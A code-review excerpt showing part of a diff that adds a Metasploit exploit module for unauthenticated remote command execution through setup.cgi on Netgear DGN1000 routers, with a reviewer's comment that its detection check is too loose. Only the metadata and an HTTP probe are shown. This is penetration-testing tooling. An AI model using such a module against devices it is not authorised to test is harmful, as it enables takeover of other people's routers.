modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb

```diff
@@ -0,0 +1,90 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
+      'Description' => %q{
+        This module exploits an unauthenticated OS command execution vulneralbility
+        in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
+        DGN2000v1 models.
+        },
+      'Author' => [
+        'Mumbai <https://github.com/realoriginal>', # module
+        'Robort Palerie' # vuln discovery
+      ],
+      'References' =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/25978/'],
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'linux',
+      'Arch' => ARCH_MIPSBE,
+      'Privileged' => true,
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      ))
+
+    end
+
+    def check
+      begin
+        res = send_request_cgi({
+          'uri' => '/setup.cgi',
+          'method' => 'GET'
+          })
+
+          if [200, 301, 302, 401].include?(res.code)
+            return Exploit::CheckCode::Detected
```

Comment:
so if ANY site EVER has setup.cgi its detected?  Is there any unique item on the page to check for, or a disclosed version number on any unuath pages?